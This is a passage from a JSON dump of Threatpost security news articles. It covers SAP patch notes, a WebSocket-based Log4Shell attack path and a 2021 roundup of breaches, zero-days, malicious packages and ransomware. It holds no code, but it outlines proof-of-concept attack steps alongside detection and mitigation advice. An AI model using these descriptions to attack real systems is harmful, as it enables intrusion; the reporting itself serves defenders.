8.8, the first high-priority note addresses SAP Commerce installations configured to use an Oracle database, according to Fritsch. \u201cThe escaping of values passed to a parameterized \u201cin\u201d clause, in flexible search queries with more than 1000 values, is processed incorrectly,\u201d he explained. \u201cThis allows an attacker to execute crafted database queries through the injection of malicious SQL commands, thus exposing the backend database.\u201d\n\nSAP Commerce customers using the B2C Accelerator are also affected by SAP Security Note #3113593, tagged with a CVSS score of 7.5. The flaw can allow an attacker with direct write access to product-related metadata in B2C Accelerator to exploit a vulnerability in the jsoup library responsible for metadata sanitization before it\u2019s processed, Fritsch said, allowing the attacker to inflict long response delays and service interruptions that result in denial of service (DoS).\n\n### SAP Knowledge Warehouse High Priority Note [#3102769](<https://launchpad.support.sap.com/#/notes/3102769>)\n\nAnother high-priority note, in SAP Knowledge Warehouse (SAP KW), is #3102769, tagged with a CVSS score of 8.8. The note patches a cross-site scripting (XSS) vulnerability that can result in sensitive data being disclosed.\n\n\u201cThe vulnerability affects the displaying component of SAP KW and SAP explicitly points out that the pure existence of that component in the customer\u2019s landscape is all that is needed to be vulnerable,\u201d Fritsch cautioned.\n\nCustomers who don\u2019t actively use the displaying component of SAP KW may still experience a security breach, he noted.\n\nThe note details two possible workarounds:\n\n * Disabling the affected display component by adding a filter with a specific custom rule\n * Adding a rewrite rule to SAP Web Dispatcher to prevent redirects (this is only applicable if requests are routed via SAP Web Dispatcher)\n\n### SAP NetWeaver AS ABAP High Priority Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>)\n\nWith a CVSS score of 8.4, SAP Security Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>) describes a code injection vulnerability in two methods of a utility class in SAP NetWeaver AS ABAP.\n\n\u201cA highly privileged user with permissions to use transaction SE24 or SE80 and execute development objects is able to call these methods and provide malicious parameter values that can lead to the execution of arbitrary commands on the operating system,\u201d Fritsch elucidated.\n\nSAP fixed the problem by integrating the affected methods directly into the class without the possibility of passing parameters to those methods. Fritsch said that the affected classes and methods are available in the \u201cCorrection Instructions\u201d section by selecting the tab \u201cTADIR Entries.\u201d\n\n### SAF-T Framework SAP High Priority Security Note [#3124094](<https://launchpad.support.sap.com/#/notes/3124094>)\n\nThis one, which patches a directory-traversal vulnerability in the SAF-T framework, is tagged with a CVSS score of 7.7. It addresses an issue with the SAF-T framework, which is used to convert SAP tax data into the Standard Audit File Tax format (SAF-T) \u2013 an OECD international standard for the electronic exchange of data that enables tax authorities of all countries to accept data for tax purposes \u2013 and back.\n\nThe note describes how an insufficient validation of path information in the framework allows an attacker to read the complete file-system structure, Fritsch explained.\n\n## Open-Source Libraries as the Weakest Link\n\nFritsch pointed to the Log4j vulnerability and the vulnerabilities described in SAP Security Notes #3109577 and #3113593 as demonstrating \u201cthat there is always a risk involved when using open-source libraries.\u201d\n\nBesides the Log4Shell elephant in the room, recent examples that prove his point about the risks entailed by relying on the security of outside code include, for example, the recent discovery of three [malicious packages hosted](<https://threatpost.com/malicious-pypi-code-packages/176971/>) in the Python Package Index (PyPI) code repository that collectively have more than 12,000 downloads: downloads that potentially translate into loads of poisoned applications.\n\nAnother of many examples of how the software supply chain has become an increasingly popular method of distributing malware cropped up last week, when a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>)\n\nExternal libraries are convenient, but are they worth the risk? You have to do the math to figure that out, Fritsch summed up: \u201cThe ability to implement new features in a short period of time is bought at the price of dependence on the security of the external libraries. Remember, a software product is only as secure as its weakest software component.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T19:31:30", "type": "threatpost", "title": "SAP Kicks Log4Shell Vulnerability Out of 20 Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T19:31:30", "id": "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "href": "https://threatpost.com/sap-log4shell-vulnerability-apps/177069/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T21:55:20", "description": "Defenders will once again be busy beavers this weekend: There\u2019s an alternative attack vector for the ubiquitous Log4j [vulnerability](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>), which relies on a basic Javascript WebSocket connection to trigger remote code-execution (RCE) on servers locally, via drive-by compromise.\n\nIn other words, an exploit can affect services running as localhost in internal systems that are not exposed to any network.\n\nThat\u2019s according to researchers at Blumira, who noted that the discovery eviscerates the notion that Log4Shell attacks [are limited to](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) exposed vulnerable web servers.\n\n\u201cThis newly discovered attack vector means that anyone with a vulnerable Log4j version can be exploited through the path of a listening server on their machine, or local network through browsing to a website, and triggering the vulnerability,\u201d researchers said in a Friday note to Threatpost.\n\n* * *\n\n**Check out all of our Log4Shell coverage:**\n\n * [Relentless Log4j Attacks Include State Actors, Possible Worm](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>)\n * [What the Log4Shell Bug Means for SMBs: Experts Weigh In](<https://threatpost.com/log4shell-bug-smbs-experts/177021/>)\n * [How to Buy Precious Patching Time as Log4j Exploits Fly (Podcast)](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>)\n * [Apache\u2019s Fix for Log4Shell Can Lead to DoS Attacks](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>)\n * _[Where the Latest Log4Shell Attacks Are Coming From](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>)_\n * [Log4Shell Is Spawning Even Nastier Mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>)\n * [SAP Kicks Log4Shell Vulnerability Out of 20 Apps](<https://threatpost.com/sap-log4shell-vulnerability-apps/177069/>)\n * [Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)\n\n* * *\n\nThis means there are several new malicious use cases for an exploit, beyond the now-well-documented ability to open a shell with a single line of code to drop malware on internet-facing web servers.\n\n\u201c[New use cases include everything] from malvertisting to creating watering holes for drive-by attacks,\u201d said Matthew Warner, CTO and co-founder of Blumira, in a technical post.\n\n## **Using WebSockets for Malicious Gain**\n\nWebSockets enables communication between a web browser and web applications, like chats and alerting on websites. They generally allow the browser to quickly send data back and forth to these types of apps, but they\u2019re also used for host-fingerprinting and port-scanning.\n\nWarner explained in his posting that WebSockets is also fraught with security risk.\n\n\u201cWebSockets are not restricted by same-origin policies like a normal cross-domain HTTP request,\u201d he explained. \u201cThey expect the server itself to validate the origin of the request. While they are useful, they also introduce a fair amount of risk as they do not include many security controls to limit their utilization.\u201d\n\nIn the Log4j case, an attacker would make malicious requests via WebSockets to a potentially vulnerable localhost or local network server. The targets don\u2019t have to be exposed to the internet.\n\n\u201cWebSockets have previously been used for port-scanning internal systems, but this represents one of the first remote code execution exploits being relayed by WebSockets,\u201d said Jake Williams, co-founder and CTO at BreachQuest, via email. \u201cThis shouldn\u2019t change anyone\u2019s position on vulnerability management though. Organizations should be pushing to patch quickly and mitigate by preventing outbound connections from potentially vulnerable services where patching is not an option.\u201d\n\n## **Local Attack Scenario for Log4Shell**\n\n_Warner offered a detailed breakdown of his proof-of-concept (PoC) for the attack in [the posting](<https://www.blumira.com/analysis-log4shell-local-trigger/>); below is a truncated explanation._\n\n**Step 1: **From a watering-hole server with the affected Log4j2 vulnerability installed, an attacker would trigger a file path URL from the browser with a WebSocket connection. Blumira used a basic Javascript WebSocket connection in the PoC, but Warner noted that \u201cthis does not necessarily need to be localhost; WebSockets allow for connection to any IP and easily could iterate private IP space.\u201d\n\n**Step 2:** As the page loads, it will initiate a local WebSocket connection, connect to the vulnerable listening server, and connect out over an identified type of connection based on a Java Naming and Directory Interface (JNDI) connection string \u2013 a technique that\u2019s similar to WebSockets\u2019 localhost port-scanning used for fingerprinting hosts.\n\n**Step 3:** Once the victim\u2019s host connects to an open port to a local service or a service accessible to the host itself, an attacker can then drop an exploit string in path or parameters. \u201cWhen this happens, the vulnerable host calls out to the exploit server, loads the attacker\u2019s class, and executes it with java.exe as the parent process,\u201d according to Warner.\n\n## **Detection and Remediation**\n\nThe bad news is that this also a stealthy approach, according to the analysis: \u201cWebSocket connections within the host can be difficult to gain deep visibility into, which increases the complexity of detection for this attack.\u201d That\u2019s because WebSocket connections silently initiate when a webpage loads, with no direct control by the client itself. However, Warner noted that there are ways to get around this.\n\nTo detect a possible attack, Warner recommended looking for instances of \u201c.*/java.exe\u201d being used as the parent process for \u201ccmd.exe/powershell.exe.\u201d\n\n\u201cThis is potentially very noisy,\u201d Warner said.\n\nAnd finally, organizations should also make sure they\u2019re set up to detect the presence of Cobalt Strike, TrickBot and related common attacker tools.\n\nTo identify where Log4j is used within local environments, there are publicly available scanning scripts, researchers noted, to identify the libraries used locally. Here are two:\n\n * Windows PoSh \u2013 https://github.com/N-able/ScriptsAndAutomationPolicies/blob/master/Vulnerability%20-%20CVE-2021-44228%20(Log4j)/get-log4jrcevulnerability.ps1\n * Cross platform \u2013 https://github.com/hillu/local-log4j-vuln-scanner/releases\n\nTo mitigate the risk completely, organizations should update all local development efforts, internal applications and internet-facing environments to Log4j 2.16 ASAP, including any custom applications.\n\nIn the meantime, users can implement egress filtering, which can restrict the callback required for the actual exploit to land, and can use tools like [NoScript Java-blocker](<https://noscript.net/>) on untrusted external sites to avoid Javascript triggering WebSocket connections.\n\n\u201cThis news does mean that relying on web application firewalls, or other network defenses, is no longer an effective mitigation,\u201d John Bambenek, principal threat hunter at Netenrich, said via email. \u201cPatching remains the single most important step an organization can take.\u201d\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T17:43:43", "type": "threatpost", "title": "Brand-New Log4Shell Attack Vector Threatens Local Hosts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T17:43:43", "id": "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "href": "https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T23:43:39", "description": "As 2021 draws to a close, and the COVID-19 pandemic drags on, it\u2019s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).\n\nWhile 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-repository malware, major zero-day vulnerabilities and fresh ransomware tactics dominated the most-read list \u2013 perhaps indicating that people are keenly focused on cybercrime innovation as the \u201cnew normal\u201d for how we work becomes more settled in.\n\n_**Jump to section:**_\n\n 1. Data Leakapalooza\n 2. Major Zero-Day Vulnerabilities\n 3. Code Repository Malware\n 4. Ransomware Innovations\n 5. Gaming Attacks\n 6. Bonus! Zodiac Killer Cipher Cracked\n\n## **1\\. The Most-Read Story of 2021: Experian Leaks Everyone\u2019s Credit Scores**\n\nThere were obviously some huge news stories that dominated headlines during the year: Log4Shell; Colonial Pipeline; Kaseya; ProxyLogon/ProxyShell; SolarWinds. But judging from article traffic, readers were most interested in\u2026the Experian data exposure.\n\nIn April, Bill Demirkapi, a sophomore student at the Rochester Institute of Technology, discovered that the credit scores of almost every American [were exposed](<https://threatpost.com/experian-api-leaks-american-credit-scores/165731/>) through an API tool used by the Experian credit bureau, which he said was left open on a lender site without even basic security protections.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/29144158/Experian.jpg>)\n\nThe tool, called the Experian Connect API, allows lenders to automate FICO-score queries. Demirkapi said he was able to build a command-line tool that let him automate lookups for any credit score for nearly anyone, even after entering all zeros in the fields for date of birth, which he named, \u201cBill\u2019s Cool Credit Score Lookup Utility.\u201d\n\nIn addition to raw credit scores, the college student said that he was able to use the API connection to get \u201crisk factors\u201d from Experian that explained potential flaws in a person\u2019s credit history, such as \u201ctoo many consumer-finance company accounts.\u201d\n\nExperian, for its part, fixed the problem \u2013 and refuted concerns from the security community that the issue could be systemic.\n\nExperian wasn\u2019t the only household name that drew in readers for data insecurity: LinkedIn data going up for sale on the Dark Web was another very hot story this year.\n\n### **LinkedIn Data Scraping**\n\nAfter 500 million LinkedIn members were affected in a data-scraping incident in April, [it happened again](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>) in June. A posting with 700 million LinkedIn records for sale appeared on popular cyberattacker destination RaidForums, by a hacker calling himself \u201cGOD User TomLiner.\u201d The advertisement included a sample of 1 million records as \u201cproof.\u201d\n\nPrivacy Sharks examined the free sample and saw that the records include full names, gender, email addresses, phone numbers and industry information. It\u2019s unclear what the origin of the data is \u2013 but the scraping of public profiles is a likely source. According to LinkedIn, no breach of its networks occurred.\n\nEven so, the security ramifications were significant, researchers said, in terms of the cache enabling brute-force cracking of account passwords, email and telephone scams, phishing attempts, identity theft and finally, the data could be a social-engineering goldmine. Sure, attackers could simply visit public profiles to target someone, but having so many records in one place could make it possible to automate targeted attacks using information about users\u2019 jobs and gender, among other details.\n\n## **2\\. Major Zero-Day Bugs**\n\nOK, this one\u2019s a perennial topic of fascination, but 2021 had some doozies, starting with Log4Shell.\n\n### **Log4Shell Threatens Basically All Web Servers in Existence**\n\nThe Log4Shell vulnerability is [an easily exploited flaw](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s still being actively exploited in the wild.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/21151757/Logs-e1640117899602.png>)\n\nThe flaw (CVE-2021-44228) first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft. Apache rushed a patch but within a day or two, attacks became rampant as threat actors tried to exploit the new bug. From there, news of additional exploitation vectors, a second bug, various kinds of real-world attacks and the sheer enormity of the threat surface (the logging library is basically everywhere) dominated reader interest in December.\n\n### **NSO Group\u2019s Zero-Click Zero Day for Apple**\n\nIn September, a [zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) dubbed ForcedEntry be researchers was found, affecting all things Apple: iPhones, iPads, Macs and Watches. It turns out that it was being exploited by NSO Group to install the infamous Pegasus spyware.\n\nApple pushed out an emergency fix, but Citizen Lab had already observed the NSO Group targeting never-before-seen, zero-click exploit targeting iMessage to illegally spy on Bahraini activists.\n\nThe ForcedEntry exploit was particularly notable in that it was successfully deployed against the latest iOS versions \u2013 14.4 & 14.6 \u2013 blowing past Apple\u2019s new BlastDoor sandboxing feature to install spyware on the iPhones of the Bahraini activists.\n\n### **Giant Zero-Day Hole in Palo Alto Security Appliances**\n\nAnother zero-day item that garnered big reader interest was [the news](<https://threatpost.com/massive-zero-day-hole-found-in-palo-alto-security-appliances/176170/>) that researchers from Randori developed a working exploit to gain remote code execution (RCE) on Palo Alto Networks\u2019 GlobalProtect firewall, via the critical bug CVE 2021-3064.\n\nRandori researchers said that if an attacker successfully exploits the weakness, they can gain a shell on the targeted system, access sensitive configuration data, extract credentials and more. And after that, attackers can dance across a targeted organization, they said: \u201cOnce an attacker has control over the firewall, they will have visibility into the internal network and can proceed to move laterally.\u201d\n\nPalo Alto Networks patched the bug on the day of disclosure.\n\n### **The Great Google Memory Bug Zero-Day**\n\nIn March, Google [hurried out a fix](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) for a vulnerability in its Chrome browser that was under active attack. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems. Readers flocked to the coverage of the issue.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/11/03120131/Google-Chrome-Browser.jpg>)\n\nNew york, USA \u2013 july 26, 2019: Start google chrome application on computer macro close up view in pixel screen\n\nThe flaw is a use-after-free vulnerability, and specifically exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.\n\n\u201cBy persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,\u201d according to IBM X-Force\u2019s report on the bug.\n\n### **Dell Kernel-Privilege Bugs**\n\nEarlier this year, five high-severity security bugs that remained hidden for 12 years [were found](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) to exist in all Dell PCs, tablets and notebooks shipped since 2009. They allow the ability to bypass security products, execute code and pivot to other parts of the network for lateral movement, according to SentinelLabs.\n\nThe flaws lurked in Dell\u2019s firmware update driver, impacting potentially hundreds of millions of Dell desktops, laptops, notebooks and tablets, researchers said.\n\nThe multiple local privilege-escalation (LPE) bugs exist in the firmware update driver version 2.3 (dbutil_2_3.sys) module, which has been in use since 2009. The driver component handles Dell firmware updates via the Dell BIOS Utility, and it comes pre-installed on most Dell machines running Windows.\n\n## 3\\. Code Repositories and the Software Supply Chain\n\nThe software supply chain is anchored by open-source code repositories \u2013 centralized locations where developers can upload software packages for use by developers in building various applications, services and other projects. They include GitHub, as well as more specialized repositories like the Node.js package manager (npm) code repository for Java; RubyGems for the Ruby programming language; Python Package Index (PyPI) for Python; and others.\n\nThese package managers represent a supply-chain threat given that anyone can upload code to them, which can in turn be unwittingly used as building blocks in various applications. Any applications corrupted by malicious code can attack the programs\u2019 users.\n\nTo boot, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27155850/threatlist-python.png>)\n\nCybercriminals have swarmed to this attack surface, and readers in 2021 loved to hear about their exploits.\n\nFor instance, in December, a [series of 17 malicious packages](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) in npm were found; they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files. The coal was to steal Discord tokens, which can be used to take over accounts.\n\nAlso this month, three malicious packages hosted in the PyPI code repository [were uncovered](<https://threatpost.com/malicious-pypi-code-packages/176971/>), which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications. The packages included one trojan for establishing a backdoor on victims\u2019 machines, and two info-stealers.\n\nResearchers also discovered last week that there were 17,000 unpatched Log4j Java packages in the Maven Central ecosystem, leaving massive supply-chain risk on the table from [Log4Shell exploits](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>). It will likely take \u201cyears\u201d for it to be fixed across the ecosystem, [according](<https://threatpost.com/java-supply-chain-log4j-bug/177211/>) to Google\u2019s security team.\n\nUsing malicious packages as a cyberattack vector was a common theme earlier in the year too. Here\u2019s a rundown of other recent discoveries:\n\n * In January, other Discord-stealing malware [was discovered](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>) in three npm packages. One, \u201can0n-chat-lib\u201d had no legitimate \u201ctwin\u201d package, but the other two made use of brandjacking and typosquatting to lure developers into thinking they\u2019re legitimate. The \u201cdiscord-fix\u201d malicious component is named to be similar to the legitimate \u201cdiscord-XP,\u201d an XP framework for Discord bots. The \u201csonatype\u201d package meanwhile made use of pure brandjacking.\n * In March, researchers [spotted](<https://threatpost.com/malicious-code-bombs-amazon-lyft-slack-zillow/164455/>) malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository \u2013 all of which exfiltrated sensitive information.\n * That March attack was based on research from security researcher Alex Birsan, who found that it\u2019s possible to [inject malicious code](<https://threatpost.com/supply-chain-hack-paypal-microsoft-apple/163814/>) into common tools for installing dependencies in developer projects. Such projects typically use public repositories from sites like GitHub. The malicious code then can use these dependencies to propagate malware through a targeted company\u2019s internal applications and systems. The novel supply-chain attack was (ethically) used to breached the systems of more than 35 technology players, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla and Uber, by exploiting public, open-source developer tools.\n * In June, a group of cryptominers was found [to have infiltrated](<https://threatpost.com/cryptominers-python-supply-chain/167135/>) the PyPI. Researchers found six different malicious packages hiding there, which had a collective 5,000 downloads.\n * In July, a credentials-stealing package that uses legitimate password-recovery tools in Google\u2019s Chrome web browser [was found lurking in ](<https://threatpost.com/npm-package-steals-chrome-passwords/168004/>)npm. Researchers caught the malware filching credentials from Chrome on Windows systems. The password-stealer is multifunctional: It also listens for incoming commands from the attacker\u2019s command-and-control (C2) server and can upload files, record from a victim\u2019s screen and camera, and execute shell commands.\n\n## **4\\. Interesting Ransomware Variants**\n\nThe ransomware epidemic matured in 2021, with the actual malware used to lock up files progressing beyond simply slapping an extension on targeted folders. Readers flocked to malware analysis stories covering advancements in ransomware strains, including the following Top 3 discoveries.\n\n### **HelloKitty\u2019s Linux Variant Targets VMs**\n\nIn June, for the first time, researchers [publicly spotted](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>) a Linux encryptor \u2013 being used by the HelloKitty ransomware gang.\n\nHelloKitty, the same group behind the [February attack](<https://threatpost.com/cyberpunk-2077-publisher-hack-ransomware/163775/>) on videogame developer CD Projekt Red, has developed numerous Linux ELF-64 versions of its ransomware, which it used to target VMware ESXi servers and virtual machines (VMs) running on them.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/16162559/hellokitty-e1626467172148.jpeg>)\n\nVMware ESXi, formerly known as ESX, is a bare-metal hypervisor that installs easily onto servers and partitions them into multiple VMs. While that makes it easy for multiple VMs to share the same hard-drive storage, it sets systems up to be one-stop shopping spots for attacks, since attackers can encrypt the centralized virtual hard drives used to store data from across VMs.\n\nDirk Schrader of New Net Technologies (NNT) told Threatpost that on top of the attraction of ESXi servers as a target, \u201cgoing that extra mile to add Linux as the origin of many virtualization platforms to [malware\u2019s] functionality\u201d has the welcome side effect of enabling attacks on any Linux machine.\n\n### **MosesStaff: No Decryption Available**\n\nA politically motivated group known as MosesStaff [was seen in November](<https://threatpost.com/mosesstaff-locks-targets-ransom-decryption/176366/>) paralyzing Israeli entities with no financial goal \u2013 and no intention of handing over decryption keys. Instead, it was using ransomware in politically motivated, destructive attacks at Israeli targets, looking to inflict the most damage possible.\n\nMosesStaff encrypts networks and steals information, with no intention of demanding a ransom or rectifying the damage. The group also maintains an active social-media presence, pushing provocative messages and videos across its channels, and making its intentions known.\n\n### **Epsilon Red Targets Exchange Servers**\n\nThreat actors in June [were seen deploying](<https://threatpost.com/exchange-servers-epsilon-red-ransomware/166640/>) new ransomware on the back of a set of PowerShell scripts developed for exploiting flaws in unpatched Exchange Servers.\n\nThe Epsilon Red ransomware \u2013 a reference to an obscure enemy character in the X-Men Marvel comics, a super soldier of Russian origin armed with four mechanical tentacles \u2013 was discovered after an attack on a U.S.-based company in the hospitality sector.\n\nResearchers said the ransomware was different in the way it spreads its hooks into a corporate network. While the malware itself is a \u201cbare-bones\u201d 64-bit Windows executable programmed in the Go programming language, its delivery system relies on a series of PowerShell scripts that \u201cprepared the attacked machines for the final ransomware payload and ultimately delivered and initiated it,\u201d they wrote.\n\n## **5\\. Gaming Security**\n\nFor the second year in a row, gaming security was on the radar for readers in 2021, possibly because cybercriminals continue to target this area as result of the global COVID-19 pandemic driving higher volumes of play. In a recent survey by Kaspersky, nearly 61 percent reported suffering foul play such as ID theft, scams or the hack of in-game valuables. Some of the most popular articles are recapped below.\n\n### **Steam Used to Host Malware**\n\nIn June, the appropriately named SteamHide malware [emerged](<https://threatpost.com/steam-gaming-delivering-malware/166784/>), which disguises itself inside profile images on the gaming platform Steam.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/01084854/Steam-logo.jpg>)\n\nThe Steam platform merely serves as a vehicle which hosts the malicious file, according to research from G Data: \u201cThe heavy lifting in the shape of downloading, unpacking and executing a malicious payload fetched by the loader is handled by an external component, which accesses the malicious profile image on one Steam profile. This external payload can be distributed via crafted emails to compromised websites.\u201d\n\nThe steganography technique is obviously not new \u2014 but Steam profiles being used as attacker-controlled hosting sites, is \u2013 and readers\u2019 ears perked up in a big way when we posted the story.\n\n### **Twitch Source-Code Leak**\n\nIn October, an anonymous user posted a link to a 125GB torrent on 4chan, containing all of Twitch\u2019s source code, comments going back to its inception, user-payout information and more.\n\nThe attacker [claimed to have ransacked](<https://threatpost.com/twitch-source-code-leaked/175359/>) the live gameplay-streaming platform for everything it\u2019s got; Twitch confirmed the breach not long after.\n\nThe threat actor rationalized gutting the service by saying that the Twitch community needs to have the wind knocked out of its lungs. They called the leak a means to \u201cfoster more disruption and competition in the online-video streaming space,\u201d because \u201ctheir community is a disgusting toxic cesspool.\u201d\n\n### **Steam-Stealing Discord Scams**\n\nIn November, a scam started making the rounds on Discord, through which cybercriminals could harvest Steam account information and make off with any value the account contained.\n\nGamer-aimed Discord scams are just about everywhere. But researchers [flagged a new approach](<https://threatpost.com/free-discord-nitro-offer-steam-credentials/176011/>) as noteworthy because it crossed over between Discord and the Stream gaming platform, with crooks offering a purported free subscription to Nitro (a Discord add-on that enables avatars, custom emoji, profile badges, bigger uploads, server boosts and so on), in exchange for \u201clinking\u201d the two accounts.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/04113440/nitro-fake-discord-website-600x324-1.png>)\n\nThe target is first served a malicious direct message on Discord with the fake offer. \u201cJust link your Steam account and enjoy,\u201d the message said, which included a link to purportedly do just that. The malicious link takes users to a spoofed Discord page with a button that reads, \u201cGet Nitro.\u201d Once a victim clicks on the button, the site appears to serve a Steam pop-up ad, but researchers explained the ad is still part of the same malicious site.\n\nThe gambit is intended to fool users into thinking they\u2019re being taken to the Steam platform to enter in their login information \u2014 in reality, the crooks are poised to harvest the credentials.\n\n### **Sony PlayStation3 Bans**\n\nIn June, a reported breach of a Sony folder containing the serial ID numbers for every PlayStation3 console out there [appeared to](<https://threatpost.com/ps3-players-ban-attacks-gaming/167303/>) have led to users being inexplicably banned from the platform.\n\nSony reportedly left a folder with every PS3 console ID online unsecured, and it was discovered and reported by a Spanish YouTuber with the handle \u201cThe WizWiki\u201d in mid-April. In June, players on PlayStation Network message boards began complaining that they couldn\u2019t sign on.\n\nUsers mused that threat actors started using the stolen PS3 console IDs for malicious purposes, causing the legitimate players to get banned. But Sony didn\u2019t confirm a connection between the PS3 ID breach and player reports of being locked out of the platform.\n\n## **Bonus Item: Zodiac Killer Cipher \u2013 Revealed!!**\n\nOne of the quirky stories that made it into the Top 10 most-read Threatpost stories for 2021 concerned the cracking of the Zodiac\u2019s serial killer\u2019s 340 cipher, which couldn\u2019t be solved for 50 years. \nIn December 2020, the code [was cracked](<https://threatpost.com/cryptologists-zodiac-killer-340-cipher/162353/>) by a team of mathematicians.\n\nThe Zodiac serial killer is believed to have murdered at least five people \u2014 and likely more \u2014 in and around the Northern California area in the late 1960s and early 1970s. The still-unnamed murderer sent a series of four coded messages to local newspaper outlets, bragging about his crimes and containing cryptic icons, which earned him the moniker \u201cZodiac.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/17122725/Zodiac-e1608226062664.jpg>)\n\nThe first cipher was quickly decoded. But the second, the 340 Cipher, named after its 340 characters, was trickier to figure out. Australian-based mathematician Sam Blake calculated that there were 650,000 possible ways to read the code, and Jarl Van Eycke, whose day job is as a warehouse operator in Belgium, wrote a code-breaking software to tackle decryption. Soon, their unique algorithmic approach paid off. The message, officially recognized by the FBI as correct, reads:\n\n\u201cI HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER 